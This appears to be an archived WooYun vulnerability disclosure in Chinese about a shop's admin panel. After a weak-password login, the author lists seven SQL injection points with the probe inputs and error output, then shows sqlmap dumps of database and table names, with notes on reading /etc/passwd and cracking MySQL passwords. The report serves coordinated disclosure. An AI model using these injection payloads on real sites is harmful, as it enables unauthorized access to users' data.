乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-01: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
利用弱口令进入后台,然后进行测试,发现多处可以进行注入。
通过先前注入测试得到的管理组的用户全部明文,就不多说了,用最高用户来测试,而且还是弱口令,难道不修复一下?管理员admin,弱口令******
1、注入点一:号码列表处,输入1'返回错误,可以看到绝对路径了。Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40 select DISTINCT a.*,b.status as order_status,b.orderid,b.ordernum from tel_number as a left join order_info as b on a.number=b.step2 where 1 and a.type_id=1 and number like '%1'%' order by a.id desc limit 0,30 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by a.id desc limit 0,30' at line 1输入1%' and 12=12 and '%'='返回正常结果输入1%' and 12=11 and '%'='返回异常结果判断存在注入
2、注入点二:品牌分类列表处http://**.**.**.**/admin/class/editclass.php?classid=686'返回错误信息Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=1返回正常结果http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=2返回错误判断存在注入http://**.**.**.**/admin/class/editgrade.php?classid=703'http://**.**.**.**/admin/class/editclass.php?classid=700'同样返回错误信息Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=1http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=2两者界面勾选不一样也就是classid该参数被用到的地方都有注入
3、注入点三参数列表中的“展开查看此分类下的属性”随便选择“颜色”后面的编辑,得到地址http://**.**.**.**/admin/class/editattribute.php?acid=327'返回错误信息Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
4、注入点四:产品列表处输入1'返回错误Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40 Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by gid desc limit 0,20' at line 1输入1%' and 12=12 and '%'='返回正常结果输入1%' and 12=11 and '%'='返回异常结果判断存在注入
5、注入点五:查看订单处输入1'返回错误信息Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40 select * from order_info where 1 and ordernum='1'' order by orderid desc limit 0,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' order by orderid desc limit 0,20' at line 1输入51871413728971' and '1'='1返回正常订单结果输入51871413728971' and '1'='2返回异常结果(订单为空)判断存在注入
6、注入点六:会员列表处输入1'返回错误信息Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by userid desc limit 0,20' at line 1输入1%' and 12=12 and '%'='返回正常结果输入1%' and 12=11 and '%'='返回异常结果判断存在注入
7、注入点7:广告管理列表处http://**.**.**.**/admin/ad/list.php?l=100'返回错误信息select * from ad_info where location=100' order by sort You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by sort' at line 1http://**.**.**.**/admin/ad/list.php?l=100 and 1=1 返回正常http://**.**.**.**/admin/ad/list.php?l=100 and 1=2 返回异常判断存在注入
我们以第七个注入点为例用sqlmap测试,抓包,或者添加cookies,否则不能进行注入
Database: dspam+----------------------+---------+| Table | Entries |+----------------------+---------+| dspam_token_data | 4649647 | 几百万数据信息,不知道是什么,没看了!~~~| dspam_signature_data | 225707 || dspam_preferences | 33 || dspam_stats | 5 || dspam_virtual_uids | 5 |+----------------------+---------+Database: ego10000+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| userinfo | 2938 || order_detail_info | 2302 || order_info | 2011 || goods_taocan_value | 1365 || goods_taocan_attr | 1274 || search_log | 1212 || notice | 1148 || usercent | 1147 || gift_order | 1141 || attribute_value_info | 1082 || goods_more_info | 960 || ask_goods_info | 689 || goods_image_info | 685 || telnumber | 566 || order_network | 430 || goods_mutuality_info | 371 || shop_basket | 343 || goods_info | 270 || goods_taocan | 147 || activityinfo | 95 || tel_number | 77 || rcmdgoods | 73 || create_html | 68 || adminmenu | 67 || news | 55 || class_info | 45 || gp_class | 45 || tel_type_template_attr | 39 || attribute_class_select_value_info | 36 || act_user_award_info | 35 || repair | 30 || tel_taocan_value | 30 || ad_info | 22 || dispatch_pay_mutuality_info | 16 || adminuser | 15 || dispatch_mode_info | 13 || act_award_info | 11 || attribute_class_info | 10 || tel_type | 8 || goods_fitting_mutuality_info | 5 || tel_type_template | 5 || admingroup | 2 || gift_info | 2 |+-----------------------------------+---------+Database: extmail+----------------+---------+| Table | Entries |+----------------+---------+| mailbox | 42 || alias | 37 || `domain` | 2 || domain_manager | 2 || manager | 2 |+----------------+---------+Database: hallylure+-----------------------------------------+---------+| Table | Entries |+-----------------------------------------+---------+| hallylure_ucenter_memberfields | 225937 || hallylure_ucenter_members | 225937 | 二十多万用户| hallylure_common_member_newprompt | 225934 || hallylure_home_notification | 215655 || hallylure_common_credit_rule_log | 215248 || hallylure_common_member | 215104 | 同样也有二十多万用户| hallylure_common_member_count | 215104 || hallylure_common_member_field_forum | 215104 || hallylure_common_member_field_home | 215104 || hallylure_common_member_profile | 215104 || hallylure_common_member_status | 215104 || hallylure_common_onlinetime | 198587 || hallylure_common_district | 45051 || hallylure_forum_statlog | 6930 || hallylure_security_failedlog | 3953 || hallylure_forum_post | 2519 || hallylure_forum_filter_post | 1159 || hallylure_forum_attachment | 921 || hallylure_common_statuser | 614 || hallylure_forum_threadpartake | 606 || hallylure_common_stat | 533 || hallylure_forum_thread | 491 || hallylure_forum_post_tableid | 486 || hallylure_common_setting | 433 || hallylure_forum_sofa | 356 || hallylure_forum_threadhot | 182 || hallylure_forum_attachment_0 | 134 || hallylure_forum_attachment_7 | 131 || hallylure_forum_attachment_8 | 124 || hallylure_common_syscache | 108 || hallylure_forum_rsscache | 106 || hallylure_forum_threadimage | 106 || hallylure_common_block_style | 103 || hallylure_forum_modwork | 101 || hallylure_forum_attachment_5 | 99 || hallylure_forum_attachment_9 | 98 || hallylure_forum_attachment_1 | 92 || hallylure_forum_threadcalendar | 86 || hallylure_common_smiley | 85 || hallylure_forum_attachment_3 | 84 || hallylure_common_admincp_perm | 67 || hallylure_ucenter_pm_indexes | 63 || hallylure_forum_attachment_6 | 61 || hallylure_forum_attachment_2 | 59 || hallylure_common_nav | 52 || hallylure_common_member_profile_setting | 51 || hallylure_ucenter_pm_members | 48 || hallylure_forum_forumfield | 47 || hallylure_forum_forum | 46 || hallylure_common_stylevar | 45 || hallylure_common_optimizer | 34 || hallylure_connect_memberbindlog | 33 || hallylure_forum_attachment_4 | 33 || hallylure_common_credit_rule | 32 || hallylure_common_member_connect | 29 || hallylure_ucenter_settings | 26 || hallylure_ucenter_pm_lists | 24 || hallylure_common_cron | 20 || hallylure_common_usergroup | 20 || hallylure_common_usergroup_field | 20 || hallylure_home_click | 15 || hallylure_common_failedlogin | 14 || hallylure_common_connect_guest | 13 || hallylure_common_plugin | 12 || hallylure_forum_threadmod | 12 || hallylure_forum_medal | 10 || hallylure_ucenter_notelist | 9 || hallylure_ucenter_pm_messages_2 | 9 || hallylure_ucenter_pm_messages_9 | 9 || hallylure_ucenter_newpm | 8 || hallylure_common_admingroup | 7 || hallylure_ucenter_pm_messages_3 | 7 || hallylure_ucenter_pm_messages_4 | 7 || hallylure_common_admincp_cmenu | 6 || hallylure_forum_typeoption | 6 || hallylure_ucenter_pm_messages_0 | 6 || hallylure_ucenter_pm_messages_7 | 6 || hallylure_common_admincp_group | 5 || hallylure_common_friendlink | 5 || hallylure_common_member_crime | 5 || hallylure_ucenter_pm_messages_1 | 5 || hallylure_ucenter_pm_messages_6 | 5 || hallylure_ucenter_pm_messages_8 | 5 || hallylure_common_failedip | 4 || hallylure_common_member_action_log | 4 || hallylure_forum_attachment_unused | 4 || hallylure_forum_bbcode | 4 || hallylure_forum_onlinelist | 4 || hallylure_home_friend | 4 || hallylure_ucenter_pm_messages_5 | 4 || hallylure_forum_grouplevel | 3 || hallylure_forum_imagetype | 3 || hallylure_common_admincp_session | 2 || hallylure_common_block | 2 || hallylure_common_cache | 2 || hallylure_common_template_block | 2 || hallylure_common_word_type | 2 || hallylure_forum_faq | 2 || hallylure_forum_hotreply_member | 2 || hallylure_forum_hotreply_number | 2 || hallylure_home_favorite | 2 || hallylure_home_friend_request | 2 || hallylure_home_friendlog | 2 || hallylure_mobile_setting | 2 || hallylure_common_credit_rule_log_field | 1 || hallylure_common_diy_data | 1 || hallylure_common_searchindex | 1 || hallylure_common_style | 1 || hallylure_common_template | 1 || hallylure_forum_promotion | 1 || hallylure_forum_threadprofile | 1 || hallylure_forum_threadtype | 1 || hallylure_home_visitor | 1 || hallylure_ucenter_admins | 1 || hallylure_ucenter_applications | 1 || hallylure_ucenter_failedlogins | 1 |+-----------------------------------------+---------+Database: shopstit+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| attribute_value_info | 18916 || shop_basket | 6900 || goods_image_info | 3742 || goods_info | 1993 || search_log | 1212 || notice | 1148 || userinfo | 830 | 用户| goods_mutuality_info | 719 || ask_goods_info | 691 || order_detail_info | 665 || telnumber | 566 || rcmdgoods | 446 || order_info | 420 || news | 418 || attribute_class_select_value_info | 367 || gp_class | 359 || attribute_class_info | 280 || class_info | 163 || goods_fav | 100 || activityinfo | 95 || usercent | 87 || adminmenu | 79 || create_html | 68 || sms | 63 || act_user_award_info | 35 || repair | 30 || goods_fitting_mutuality_info | 26 || dispatch_pay_mutuality_info | 17 || dispatch_mode_info | 13 || act_award_info | 10 || adminuser | 8 | 管理员| admingroup | 5 |+-----------------------------------+---------+Database: stit_v3+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| goods_taocan_attr | 1303 || goods_taocan_value | 1289 || search_log | 1212 || notice | 1148 || attribute_value_info | 1091 || goods_more_info | 1072 || goods_image_info | 793 || ask_goods_info | 689 || tel_number | 670 || telnumber | 566 || goods_mutuality_info | 407 || goods_info | 298 || userinfo | 280 | 用户| order_detail_info | 248 || gp_class | 214 || order_info | 195 || news | 158 || goods_taocan | 156 || tel_type_template_attr | 121 || shop_basket | 114 || activityinfo | 95 || rcmdgoods | 94 || create_html | 68 || adminmenu | 64 || tel_taocan_value | 55 || class_info | 48 || act_user_award_info | 35 || repair | 30 || attribute_class_select_value_info | 28 || goods_fitting_mutuality_info | 22 || ad_info | 20 || order_network | 17 || tel_type_template | 14 || dispatch_pay_mutuality_info | 13 || tel_type | 13 || dispatch_mode_info | 12 || act_award_info | 11 || attribute_class_info | 9 || adminuser | 5 | 管理员| admingroup | 1 || gift_info | 1 |+-----------------------------------+---------+Database: ybzdb+---------------------+---------+| Table | Entries |+---------------------+---------+| v9_linkage | 3284 || v9_menu | 349 || v9_model_field | 103 || v9_guestbook | 43 || v9_hits | 33 || v9_search | 33 || v9_position_data | 30 || v9_cache | 29 || v9_news | 29 || v9_news_data | 29 || v9_admin_role_priv | 28 || v9_module | 27 || v9_category_priv | 23 || v9_attachment | 19 || v9_category | 17 || v9_page | 11 || v9_poster | 10 || v9_poster_space | 10 || v9_urlrule | 8 || v9_admin_role | 7 || v9_member_group | 7 || v9_type | 7 || v9_position | 6 || v9_model | 5 || v9_sso_settings | 5 || v9_biaodan_data | 4 || v9_picture | 4 || v9_picture_data | 4 || v9_workflow | 4 || v9_admin_panel | 3 || v9_member_menu | 3 || v9_admin | 2 | 管理员| v9_announce | 2 || v9_attachment_index | 2 || v9_link | 2 || v9_comment_setting | 1 || v9_comment_table | 1 || v9_session | 1 || v9_site | 1 || v9_sso_admin | 1 | 管理员| v9_sso_applications | 1 || v9_wap | 1 |+---------------------+---------+Database: mysql+---------------+---------+| Table | Entries |+---------------+---------+| help_relation | 993 || help_topic | 508 || help_keyword | 452 || help_category | 38 || `user` | 9 || db | 6 || func | 5 || cgfuhc | 2 || ehuyzk32 | 2 || ejfjxv32 | 2 || gjippi | 2 || jtjqbr | 2 || nciupb32 | 2 || omrnqa | 2 || qpicbb | 2 || ysqzut | 2 || yttxfg32 | 2 || zcsxqm32 | 2 || zfdipw32 | 2 || abcgv | 1 || abcgvmo | 1 || tempEx | 1 || tempExT1 | 1 |+---------------+---------+
权限很大,读取网站任意文件/etc/passwd
可以破解mysql密码,连接数据库
过滤修复如果是废弃系统,赶紧关闭吧!~~~
危害等级:中
漏洞Rank:10
确认时间:2015-10-10 17:02
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.
暂无
